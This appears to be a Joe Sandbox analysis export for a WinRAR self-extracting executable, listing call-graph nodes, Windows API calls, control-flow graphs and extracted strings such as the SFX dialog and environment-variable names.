___vcrt_FlsFree 5 API calls 25042->25043 25044 fa3c71 25043->25044 25045 fa3c8a TlsAlloc 25044->25045 25046 fa2b96 25044->25046 25046->25015 
25047 fa3d08 6 API calls ___vcrt_FlsFree 25046->25047 25047->25017 25048->25015 25052 fac077 25049->25052 25053 fac073 25049->25053 25050 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25051 f9eefe 25050->25051 25051->24925 25051->25005 25052->25053 25055 faa6a0 25052->25055 25053->25050 25056 faa6ac __FrameHandler3::FrameUnwindToState 25055->25056 25067 faac31 EnterCriticalSection 25056->25067 25058 faa6b3 25068 fac528 25058->25068 25060 faa6c2 25065 faa6d1 25060->25065 25081 faa529 29 API calls 25060->25081 25063 faa6cc 25082 faa5df GetStdHandle GetFileType 25063->25082 25083 faa6ed LeaveCriticalSection _abort 25065->25083 25066 faa6e2 _abort 25066->25052 25067->25058 25069 fac534 __FrameHandler3::FrameUnwindToState 25068->25069 25070 fac558 25069->25070 25071 fac541 25069->25071 25084 faac31 EnterCriticalSection 25070->25084 25092 fa91a8 20 API calls _abort 25071->25092 25074 fac564 25080 fac590 25074->25080 25085 fac479 25074->25085 25075 fac546 25093 fa9087 26 API calls ___std_exception_copy 25075->25093 25077 fac550 _abort 25077->25060 25094 fac5b7 LeaveCriticalSection _abort 25080->25094 25081->25063 25082->25065 25083->25066 25084->25074 25086 fab136 _unexpected 20 API calls 25085->25086 25087 fac48b 25086->25087 25090 faaf0a 11 API calls 25087->25090 25091 fac498 25087->25091 25088 fa8dcc _free 20 API calls 25089 fac4ea 25088->25089 25089->25074 25090->25087 25091->25088 25092->25075 25093->25077 25094->25077 25096 f9ec50 25095->25096 25097 f9086d GetModuleHandleW 25096->25097 25098 f90888 GetProcAddress 25097->25098 25099 f908e7 25097->25099 25101 f908b9 GetProcAddress 25098->25101 25102 f908a1 25098->25102 25100 f90c14 GetModuleFileNameW 25099->25100 25200 fa75fb 42 API calls __vsnwprintf_l 25099->25200 25111 f90c32 25100->25111 25103 f908cb 25101->25103 25102->25101 25103->25099 25105 f90b54 25105->25100 25106 f90b5f GetModuleFileNameW CreateFileW 25105->25106 25107 f90c08 CloseHandle 25106->25107 25108 f90b8f SetFilePointer 
25106->25108 25107->25100 25108->25107 25109 f90b9d ReadFile 25108->25109 25109->25107 25113 f90bbb 25109->25113 25114 f90c94 GetFileAttributesW 25111->25114 25116 f90c5d CompareStringW 25111->25116 25117 f90cac 25111->25117 25191 f8b146 25111->25191 25194 f9081b 25111->25194 25113->25107 25115 f9081b 2 API calls 25113->25115 25114->25111 25114->25117 25115->25113 25116->25111 25118 f90cb7 25117->25118 25120 f90cec 25117->25120 25121 f90cd0 GetFileAttributesW 25118->25121 25123 f90ce8 25118->25123 25119 f90dfb 25143 f9a64d GetCurrentDirectoryW 25119->25143 25120->25119 25122 f8b146 GetVersionExW 25120->25122 25121->25118 25121->25123 25124 f90d06 25122->25124 25123->25120 25125 f90d0d 25124->25125 25126 f90d73 25124->25126 25128 f9081b 2 API calls 25125->25128 25127 f84092 _swprintf 51 API calls 25126->25127 25129 f90d9b AllocConsole 25127->25129 25130 f90d17 25128->25130 25131 f90da8 GetCurrentProcessId AttachConsole 25129->25131 25132 f90df3 ExitProcess 25129->25132 25133 f9081b 2 API calls 25130->25133 25201 fa3e13 25131->25201 25135 f90d21 25133->25135 25137 f8e617 53 API calls 25135->25137 25136 f90dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25136->25132 25138 f90d3c 25137->25138 25139 f84092 _swprintf 51 API calls 25138->25139 25140 f90d4f 25139->25140 25141 f8e617 53 API calls 25140->25141 25142 f90d5e 25141->25142 25142->25132 25143->24943 25145 f9081b 2 API calls 25144->25145 25146 f9ac2a OleInitialize 25145->25146 25147 f9ac4d GdiplusStartup SHGetMalloc 25146->25147 25147->24945 25150 f9c5ce 25148->25150 25149 f9c6e4 25149->24953 25149->24954 25150->25149 25152 f91fac CharUpperW 25150->25152 25203 f8f3fa 82 API calls 2 library calls 25150->25203 25152->25150 25154 f9ec50 25153->25154 25155 f9dbeb SetEnvironmentVariableW 25154->25155 25157 f9dc0e 25155->25157 25156 f9dc36 25156->24948 25157->25156 25158 f9dc2a SetEnvironmentVariableW 25157->25158 25158->25156 25160 f9b70b GetObjectW 25159->25160 25161 f9b6fe 25159->25161 25165 f9b71a 25160->25165 
25204 f9a6c2 FindResourceW 25161->25204 25164 f9a5c6 4 API calls 25166 f9b72d 25164->25166 25165->25164 25167 f9b770 25166->25167 25168 f9b74c 25166->25168 25169 f9a6c2 13 API calls 25166->25169 25178 f8da42 25167->25178 25220 f9a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25168->25220 25171 f9b73d 25169->25171 25171->25168 25173 f9b743 DeleteObject 25171->25173 25172 f9b754 25221 f9a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25172->25221 25173->25168 25175 f9b75d 25222 f9a80c 8 API calls 25175->25222 25177 f9b764 DeleteObject 25177->25167 25231 f8da67 25178->25231 25183 f990b7 25184 f9eb38 8 API calls 25183->25184 25185 f990d6 25184->25185 25185->24967 25187 f9acab GdiplusShutdown CoUninitialize 25186->25187 25187->24983 25189->24975 25190->24981 25192 f8b15a GetVersionExW 25191->25192 25193 f8b196 25191->25193 25192->25193 25193->25111 25195 f9ec50 25194->25195 25196 f90828 GetSystemDirectoryW 25195->25196 25197 f9085e 25196->25197 25198 f90840 25196->25198 25197->25111 25199 f90851 LoadLibraryW 25198->25199 25199->25197 25200->25105 25202 fa3e1b 25201->25202 25202->25136 25202->25202 25203->25150 25205 f9a7d3 25204->25205 25206 f9a6e5 SizeofResource 25204->25206 25205->25160 25205->25165 25206->25205 25207 f9a6fc LoadResource 25206->25207 25207->25205 25208 f9a711 LockResource 25207->25208 25208->25205 25209 f9a722 GlobalAlloc 25208->25209 25209->25205 25210 f9a73d GlobalLock 25209->25210 25211 f9a7cc GlobalFree 25210->25211 25212 f9a74c __InternalCxxFrameHandler 25210->25212 25211->25205 25213 f9a754 CreateStreamOnHGlobal 25212->25213 25214 f9a76c 25213->25214 25215 f9a7c5 GlobalUnlock 25213->25215 25223 f9a626 GdipAlloc 25214->25223 25215->25211 25218 f9a79a GdipCreateHBITMAPFromBitmap 25219 f9a7b0 25218->25219 25219->25215 25220->25172 25221->25175 25222->25177 25224 f9a638 25223->25224 25225 f9a645 25223->25225 25227 f9a3b9 25224->25227 25225->25215 25225->25218 25225->25219 25228 f9a3da GdipCreateBitmapFromStreamICM 25227->25228 25229 f9a3e1 
GdipCreateBitmapFromStream 25227->25229 25230 f9a3e6 25228->25230 25229->25230 25230->25225 25232 f8da75 __EH_prolog 25231->25232 25233 f8daa4 GetModuleFileNameW 25232->25233 25234 f8dad5 25232->25234 25235 f8dabe 25233->25235 25277 f898e0 25234->25277 25235->25234 25237 f8db31 25288 fa6310 25237->25288 25238 f8959a 80 API calls 25239 f8da4e 25238->25239 25275 f8e29e GetModuleHandleW FindResourceW 25239->25275 25241 f8e261 78 API calls 25243 f8db05 25241->25243 25242 f8db44 25244 fa6310 26 API calls 25242->25244 25243->25237 25243->25241 25255 f8dd4a 25243->25255 25252 f8db56 ___vcrt_FlsFree 25244->25252 25245 f8dc85 25245->25255 25308 f89d70 81 API calls 25245->25308 25247 f89e80 79 API calls 25247->25252 25249 f8dc9f ___std_exception_copy 25250 f89bd0 82 API calls 25249->25250 25249->25255 25253 f8dcc8 ___std_exception_copy 25250->25253 25252->25245 25252->25247 25252->25255 25302 f89bd0 25252->25302 25307 f89d70 81 API calls 25252->25307 25253->25255 25272 f8dcd3 _wcslen ___std_exception_copy ___vcrt_FlsFree 25253->25272 25309 f91b84 MultiByteToWideChar 25253->25309 25255->25238 25256 f8e159 25260 f8e1de 25256->25260 25315 fa8cce 26 API calls ___std_exception_copy 25256->25315 25258 f8e16e 25316 fa7625 26 API calls ___std_exception_copy 25258->25316 25261 f8e214 25260->25261 25265 f8e261 78 API calls 25260->25265 25266 fa6310 26 API calls 25261->25266 25263 f8e1c6 25317 f8e27c 78 API calls 25263->25317 25265->25260 25267 f8e22d 25266->25267 25268 fa6310 26 API calls 25267->25268 25268->25255 25270 f91da7 WideCharToMultiByte 25270->25272 25272->25255 25272->25256 25272->25270 25310 f8e5b1 50 API calls __vsnprintf 25272->25310 25311 fa6159 26 API calls 3 library calls 25272->25311 25312 fa8cce 26 API calls ___std_exception_copy 25272->25312 25313 fa7625 26 API calls ___std_exception_copy 25272->25313 25314 f8e27c 78 API calls 25272->25314 25276 f8da55 25275->25276 25276->25183 25278 f898ea 25277->25278 25279 f8994b CreateFileW 25278->25279 25280 f8996c 
GetLastError 25279->25280 25283 f899bb 25279->25283 25281 f8bb03 GetCurrentDirectoryW 25280->25281 25282 f8998c 25281->25282 25282->25283 25284 f89990 CreateFileW GetLastError 25282->25284 25285 f899e5 SetFileTime 25283->25285 25287 f899ff 25283->25287 25284->25283 25286 f899b5 25284->25286 25285->25287 25286->25283 25287->25243 25289 fa6349 25288->25289 25290 fa634d 25289->25290 25301 fa6375 25289->25301 25318 fa91a8 20 API calls _abort 25290->25318 25292 fa6352 25319 fa9087 26 API calls ___std_exception_copy 25292->25319 25293 fa6699 25295 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25293->25295 25297 fa66a6 25295->25297 25296 fa635d 25298 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25296->25298 25297->25242 25299 fa6369 25298->25299 25299->25242 25301->25293 25320 fa6230 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25301->25320 25303 f89bdc 25302->25303 25305 f89be3 25302->25305 25303->25252 25305->25303 25306 f89785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 25305->25306 25321 f86d1a 77 API calls 25305->25321 25306->25305 25307->25252 25308->25249 25309->25272 25310->25272 25311->25272 25312->25272 25313->25272 25314->25272 25315->25258 25316->25263 25317->25260 25318->25292 25319->25296 25320->25301 25321->25305 25323 fa7ce1 _unexpected 25322->25323 25324 fa7cfa 25323->25324 25325 fa7ce8 25323->25325 25346 faac31 EnterCriticalSection 25324->25346 25358 fa7e2f GetModuleHandleW 25325->25358 25328 fa7ced 25328->25324 25359 fa7e73 GetModuleHandleExW 25328->25359 25329 fa7d9f 25347 fa7ddf 25329->25347 25334 fa7d76 25335 fa7d8e 25334->25335 25340 fa8a91 _abort 5 API calls 25334->25340 25341 fa8a91 _abort 5 API calls 25335->25341 25336 fa7d01 25336->25329 25336->25334 25367 fa87e0 20 API calls _abort 25336->25367 25337 fa7de8 25368 fb2390 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25337->25368 25338 fa7dbc 25350 fa7dee 25338->25350 25340->25335 
25341->25329 25346->25336 25369 faac81 LeaveCriticalSection 25347->25369 25349 fa7db8 25349->25337 25349->25338 25370 fab076 25350->25370 25353 fa7e1c 25356 fa7e73 _abort 8 API calls 25353->25356 25354 fa7dfc GetPEB 25354->25353 25355 fa7e0c GetCurrentProcess TerminateProcess 25354->25355 25355->25353 25357 fa7e24 ExitProcess 25356->25357 25358->25328 25360 fa7e9d GetProcAddress 25359->25360 25361 fa7ec0 25359->25361 25362 fa7eb2 25360->25362 25363 fa7ecf 25361->25363 25364 fa7ec6 FreeLibrary 25361->25364 25362->25361 25365 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25363->25365 25364->25363 25366 fa7cf9 25365->25366 25366->25324 25367->25334 25369->25349 25371 fab09b 25370->25371 25372 fab091 25370->25372 25373 faac98 _unexpected 5 API calls 25371->25373 25374 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25372->25374 25373->25372 25375 fa7df8 25374->25375 25375->25353 25375->25354 25464 f86faa 111 API calls 3 library calls 25411 f9dca1 DialogBoxParamW 25465 f9f3a0 27 API calls 25414 faa4a0 71 API calls _free 25415 fb08a0 IsProcessorFeaturePresent 25466 f9eda7 48 API calls _unexpected 25417 f9c793 97 API calls 4 library calls 25468 f9b18d 78 API calls 25469 f99580 6 API calls 25419 f9c793 102 API calls 4 library calls 23463 f89f7a 23464 f89f88 23463->23464 23465 f89f8f 23463->23465 23466 f89f9c GetStdHandle 23465->23466 23473 f89fab 23465->23473 23466->23473 23467 f8a003 WriteFile 23467->23473 23468 f89fcf 23469 f89fd4 WriteFile 23468->23469 23468->23473 23469->23468 23469->23473 23471 f8a095 23475 f86e98 77 API calls 23471->23475 23473->23464 23473->23467 23473->23468 23473->23469 23473->23471 23474 f86baa 78 API calls 23473->23474 23474->23473 23475->23464 25421 f9a070 10 API calls 25423 f9b270 99 API calls 25474 f81f72 128 API calls __EH_prolog 23531 f89a74 23535 f89a7e 23531->23535 23532 f89ab1 23533 f89b9d SetFilePointer 23533->23532 23534 f89bb6 GetLastError 23533->23534 23534->23532 23535->23532 
23535->23533 23537 f89b79 23535->23537 23538 f8981a 23535->23538 23537->23533 23539 f89833 23538->23539 23542 f89e80 23539->23542 23543 f89e92 23542->23543 23544 f89ea5 23542->23544 23547 f89865 23543->23547 23551 f86d5b 77 API calls 23543->23551 23546 f89eb8 SetFilePointer 23544->23546 23544->23547 23546->23547 23548 f89ed4 GetLastError 23546->23548 23547->23537 23548->23547 23549 f89ede 23548->23549 23549->23547 23552 f86d5b 77 API calls 23549->23552 23551->23544 23552->23547 25424 f81075 84 API calls 23554 f9e569 23555 f9e517 23554->23555 23555->23554 23557 f9e85d 23555->23557 23583 f9e5bb 23557->23583 23559 f9e86d 23560 f9e8ca 23559->23560 23567 f9e8ee 23559->23567 23561 f9e7fb DloadReleaseSectionWriteAccess 6 API calls 23560->23561 23562 f9e8d5 RaiseException 23561->23562 23577 f9eac3 23562->23577 23563 f9e966 LoadLibraryExA 23564 f9e979 GetLastError 23563->23564 23565 f9e9c7 23563->23565 23570 f9e9a2 23564->23570 23576 f9e98c 23564->23576 23568 f9e9d9 23565->23568 23569 f9e9d2 FreeLibrary 23565->23569 23566 f9ea95 23592 f9e7fb 23566->23592 23567->23563 23567->23565 23567->23566 23567->23568 23568->23566 23571 f9ea37 GetProcAddress 23568->23571 23569->23568 23572 f9e7fb DloadReleaseSectionWriteAccess 6 API calls 23570->23572 23571->23566 23573 f9ea47 GetLastError 23571->23573 23574 f9e9ad RaiseException 23572->23574 23579 f9ea5a 23573->23579 23574->23577 23576->23565 23576->23570 23577->23555 23578 f9e7fb DloadReleaseSectionWriteAccess 6 API calls 23580 f9ea7b RaiseException 23578->23580 23579->23566 23579->23578 23581 f9e5bb ___delayLoadHelper2@8 6 API calls 23580->23581 23582 f9ea92 23581->23582 23582->23566 23584 f9e5ed 23583->23584 23585 f9e5c7 23583->23585 23584->23559 23600 f9e664 23585->23600 23587 f9e5cc 23588 f9e5e8 23587->23588 23603 f9e78d 23587->23603 23608 f9e5ee GetModuleHandleW GetProcAddress GetProcAddress 23588->23608 23591 f9e836 23591->23559 23593 f9e80d 23592->23593 23594 f9e82f 23592->23594 23595 f9e664 DloadReleaseSectionWriteAccess 3 API 
calls 23593->23595 23594->23577 23596 f9e812 23595->23596 23597 f9e82a 23596->23597 23598 f9e78d DloadProtectSection 3 API calls 23596->23598 23611 f9e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23597->23611 23598->23597 23609 f9e5ee GetModuleHandleW GetProcAddress GetProcAddress 23600->23609 23602 f9e669 23602->23587 23606 f9e7a2 DloadProtectSection 23603->23606 23604 f9e7a8 23604->23588 23605 f9e7dd VirtualProtect 23605->23604 23606->23604 23606->23605 23610 f9e6a3 VirtualQuery GetSystemInfo 23606->23610 23608->23591 23609->23602 23610->23605 23611->23594 25425 fa8268 55 API calls _free 25426 f9c793 107 API calls 4 library calls 25475 fa7f6e 52 API calls 3 library calls 24653 f9cd58 24655 f9ce22 24653->24655 24659 f9cd7b 24653->24659 24654 f9b314 ExpandEnvironmentStringsW 24669 f9c793 _wcslen _wcsrchr 24654->24669 24655->24669 24681 f9d78f 24655->24681 24657 f9d40a 24658 f91fbb CompareStringW 24658->24659 24659->24655 24659->24658 24661 f9ca67 SetWindowTextW 24661->24669 24664 fa3e3e 22 API calls 24664->24669 24666 f9c855 SetFileAttributesW 24668 f9c90f GetFileAttributesW 24666->24668 24679 f9c86f __cftof _wcslen 24666->24679 24668->24669 24671 f9c921 DeleteFileW 24668->24671 24669->24654 24669->24657 24669->24661 24669->24664 24669->24666 24672 f9cc31 GetDlgItem SetWindowTextW SendMessageW 24669->24672 24675 f9cc71 SendMessageW 24669->24675 24680 f91fbb CompareStringW 24669->24680 24705 f9a64d GetCurrentDirectoryW 24669->24705 24707 f8a5d1 6 API calls 24669->24707 24708 f8a55a FindClose 24669->24708 24709 f9b48e 76 API calls 2 library calls 24669->24709 24671->24669 24673 f9c932 24671->24673 24672->24669 24674 f84092 _swprintf 51 API calls 24673->24674 24676 f9c952 GetFileAttributesW 24674->24676 24675->24669 24676->24673 24677 f9c967 MoveFileW 24676->24677 24677->24669 24678 f9c97f MoveFileExW 24677->24678 24678->24669 24679->24668 24679->24669 24706 f8b991 51 API calls 2 library calls 24679->24706 24680->24669 24683 f9d799 
__cftof _wcslen 24681->24683 24682 f9d9e7 24682->24669 24683->24682 24684 f9d8a5 24683->24684 24685 f9d9c0 24683->24685 24710 f91fbb CompareStringW 24683->24710 24687 f8a231 3 API calls 24684->24687 24685->24682 24688 f9d9de ShowWindow 24685->24688 24689 f9d8ba 24687->24689 24688->24682 24690 f9d8d9 ShellExecuteExW 24689->24690 24711 f8b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 24689->24711 24690->24682 24696 f9d8ec 24690->24696 24692 f9d8d1 24692->24690 24693 f9d925 24712 f9dc3b 6 API calls 24693->24712 24694 f9d97b CloseHandle 24695 f9d989 24694->24695 24700 f9d994 24694->24700 24713 f91fbb CompareStringW 24695->24713 24696->24693 24696->24694 24698 f9d91b ShowWindow 24696->24698 24698->24693 24700->24685 24701 f9d93d 24701->24694 24702 f9d950 GetExitCodeProcess 24701->24702 24702->24694 24703 f9d963 24702->24703 24703->24694 24705->24669 24706->24679 24707->24669 24708->24669 24709->24669 24710->24684 24711->24692 24712->24701 24713->24700 24718 fac051 31 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25428 f9e455 14 API calls ___delayLoadHelper2@8 25429 f9a440 GdipCloneImage GdipAlloc 25430 fa3a40 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 25479 fb1f40 CloseHandle 25481 f9f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25482 f9ff30 LocalFree 24759 fabb30 24760 fabb42 24759->24760 24761 fabb39 24759->24761 24763 faba27 24761->24763 24764 fa97e5 _unexpected 38 API calls 24763->24764 24765 faba34 24764->24765 24783 fabb4e 24765->24783 24767 faba3c 24792 fab7bb 24767->24792 24770 faba53 24770->24760 24771 fa8e06 __vswprintf_c_l 21 API calls 24772 faba64 24771->24772 24773 faba96 24772->24773 24799 fabbf0 24772->24799 24776 fa8dcc _free 20 API calls 24773->24776 24776->24770 24777 faba91 24809 fa91a8 20 API calls _abort 24777->24809 24779 fabada 24779->24773 24810 fab691 26 API calls 24779->24810 24780 fabaae 24780->24779 24781 fa8dcc _free 
20 API calls 24780->24781 24781->24779 24784 fabb5a __FrameHandler3::FrameUnwindToState 24783->24784 24785 fa97e5 _unexpected 38 API calls 24784->24785 24790 fabb64 24785->24790 24787 fabbe8 _abort 24787->24767 24790->24787 24791 fa8dcc _free 20 API calls 24790->24791 24811 fa8d24 38 API calls _abort 24790->24811 24812 faac31 EnterCriticalSection 24790->24812 24813 fabbdf LeaveCriticalSection _abort 24790->24813 24791->24790 24793 fa4636 __cftof 38 API calls 24792->24793 24794 fab7cd 24793->24794 24795 fab7ee 24794->24795 24796 fab7dc GetOEMCP 24794->24796 24797 fab805 24795->24797 24798 fab7f3 GetACP 24795->24798 24796->24797 24797->24770 24797->24771 24798->24797 24800 fab7bb 40 API calls 24799->24800 24801 fabc0f 24800->24801 24804 fabc60 IsValidCodePage 24801->24804 24806 fabc16 24801->24806 24808 fabc85 __cftof 24801->24808 24802 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24803 faba89 24802->24803 24803->24777 24803->24780 24805 fabc72 GetCPInfo 24804->24805 24804->24806 24805->24806 24805->24808 24806->24802 24814 fab893 GetCPInfo 24808->24814 24809->24773 24810->24773 24812->24790 24813->24790 24815 fab8cd 24814->24815 24823 fab977 24814->24823 24824 fac988 24815->24824 24817 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24819 faba23 24817->24819 24819->24806 24822 faab78 __vswprintf_c_l 43 API calls 24822->24823 24823->24817 24825 fa4636 __cftof 38 API calls 24824->24825 24826 fac9a8 MultiByteToWideChar 24825->24826 24828 fac9e6 24826->24828 24836 faca7e 24826->24836 24829 faca07 __cftof __vsnwprintf_l 24828->24829 24831 fa8e06 __vswprintf_c_l 21 API calls 24828->24831 24833 faca78 24829->24833 24835 faca4c MultiByteToWideChar 24829->24835 24830 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24832 fab92e 24830->24832 24831->24829 24838 faab78 24832->24838 24843 faabc3 20 API calls _free 24833->24843 24835->24833 24837 faca68 GetStringTypeW 24835->24837 24836->24830 
24837->24833 24839 fa4636 __cftof 38 API calls 24838->24839 24840 faab8b 24839->24840 24844 faa95b 24840->24844 24843->24836 24845 faa976 __vswprintf_c_l 24844->24845 24846 faa99c MultiByteToWideChar 24845->24846 24847 faab50 24846->24847 24848 faa9c6 24846->24848 24849 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24847->24849 24853 fa8e06 __vswprintf_c_l 21 API calls 24848->24853 24855 faa9e7 __vsnwprintf_l 24848->24855 24850 faab63 24849->24850 24850->24822 24851 faaa9c 24880 faabc3 20 API calls _free 24851->24880 24852 faaa30 MultiByteToWideChar 24852->24851 24854 faaa49 24852->24854 24853->24855 24871 faaf6c 24854->24871 24855->24851 24855->24852 24859 faaaab 24861 fa8e06 __vswprintf_c_l 21 API calls 24859->24861 24864 faaacc __vsnwprintf_l 24859->24864 24860 faaa73 24860->24851 24862 faaf6c __vswprintf_c_l 11 API calls 24860->24862 24861->24864 24862->24851 24863 faab41 24879 faabc3 20 API calls _free 24863->24879 24864->24863 24865 faaf6c __vswprintf_c_l 11 API calls 24864->24865 24867 faab20 24865->24867 24867->24863 24868 faab2f WideCharToMultiByte 24867->24868 24868->24863 24869 faab6f 24868->24869 24881 faabc3 20 API calls _free 24869->24881 24872 faac98 _unexpected 5 API calls 24871->24872 24873 faaf93 24872->24873 24876 faaf9c 24873->24876 24882 faaff4 10 API calls 3 library calls 24873->24882 24875 faafdc LCMapStringW 24875->24876 24877 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24876->24877 24878 faaa60 24877->24878 24878->24851 24878->24859 24878->24860 24879->24851 24880->24847 24881->24851 24882->24875 25433 fac030 GetProcessHeap 25434 f9c220 93 API calls _swprintf 25436 faf421 21 API calls __vswprintf_c_l 25437 f81025 29 API calls 25485 f81710 86 API calls 25486 f9ad10 73 API calls 25440 f9a400 GdipDisposeImage GdipFree 25441 f9d600 70 API calls 25442 fa6000 QueryPerformanceFrequency QueryPerformanceCounter 25444 faf200 51 API calls 25489 fa2900 6 API calls 4 library calls 25491 faa700 21 
API calls

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00F90863: GetModuleHandleW.KERNEL32(kernel32), ref: 00F9087C
                                            • Part of subcall function 00F90863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00F9088E
                                            • Part of subcall function 00F90863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00F908BF
                                            • Part of subcall function 00F9A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00F9A655
                                            • Part of subcall function 00F9AC16: OleInitialize.OLE32(00000000), ref: 00F9AC2F
                                            • Part of subcall function 00F9AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00F9AC66
                                            • Part of subcall function 00F9AC16: SHGetMalloc.SHELL32(00FC8438), ref: 00F9AC70
                                          • GetCommandLineW.KERNEL32 ref: 00F9DF5C
                                          • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00F9DF83
                                          • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00F9DF94
                                          • UnmapViewOfFile.KERNEL32(00000000), ref: 00F9DFCE
                                            • Part of subcall function 00F9DBDE: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 00F9DBF4
                                            • Part of subcall function 00F9DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00F9DC30
                                          • CloseHandle.KERNEL32(00000000), ref: 00F9DFD7
                                          • GetModuleFileNameW.KERNEL32(00000000,00FDEC90,00000800), ref: 00F9DFF2
                                          • SetEnvironmentVariableW.KERNEL32(sfxname,00FDEC90), ref: 00F9DFFE
                                          • GetLocalTime.KERNEL32(?), ref: 00F9E009
                                          • _swprintf.LIBCMT ref: 00F9E048
                                          • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00F9E05A
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00F9E061
                                          • LoadIconW.USER32(00000000,00000064), ref: 00F9E078
                                          • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00F9E0C9
                                          • Sleep.KERNEL32(?), ref: 00F9E0F7
                                          • DeleteObject.GDI32 ref: 00F9E130
                                          • DeleteObject.GDI32(?), ref: 00F9E140
                                          • CloseHandle.KERNEL32 ref: 00F9E183
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1226110830.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                          • Associated: 00000000.00000002.1226095961.0000000000F80000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226132422.0000000000FB3000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FBE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FC5000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226146845.0000000000FE2000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1226184019.0000000000FE3000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_f80000_HcEvQKWAu2.jbxd
                                          Similarity
                                          • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                          • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 812 f9a6c2-f9a6df FindResourceW 813 f9a7db 812->813 814 f9a6e5-f9a6f6 SizeofResource 812->814 816 f9a7dd-f9a7e1 813->816 814->813 815 f9a6fc-f9a70b LoadResource 814->815 815->813 817 f9a711-f9a71c LockResource 815->817 817->813 818 f9a722-f9a737 GlobalAlloc 817->818 819 f9a73d-f9a746 GlobalLock 818->819 820 f9a7d3-f9a7d9 818->820 821 f9a7cc-f9a7cd GlobalFree 819->821 822 f9a74c-f9a76a call fa0320 CreateStreamOnHGlobal 819->822 820->816 821->820 825 f9a76c-f9a78e call f9a626 822->825 826 f9a7c5-f9a7c6 GlobalUnlock 822->826 825->826 831 f9a790-f9a798 825->831 826->821 832 f9a79a-f9a7ae GdipCreateHBITMAPFromBitmap 831->832 833 f9a7b3-f9a7c1 831->833 832->833 834 f9a7b0 832->834 833->826 834->833
                                          APIs
                                          • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6D5
                                          • SizeofResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A6EC
                                          • LoadResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A703
                                          • LockResource.KERNEL32(00000000,?,?,?,00F9B73D,00000066), ref: 00F9A712
                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,00F9B73D,00000066), ref: 00F9A72D
                                          • GlobalLock.KERNEL32 ref: 00F9A73E
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00F9A762
                                          • GlobalUnlock.KERNEL32(00000000), ref: 00F9A7C6
                                            • Part of subcall function 00F9A626: GdipAlloc.GDIPLUS(00000010), ref: 00F9A62C
                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00F9A7A7
                                          • GlobalFree.KERNEL32(00000000), ref: 00F9A7CD
                                          Strings
                                          Similarity
                                          • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                          • String ID: PNG

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
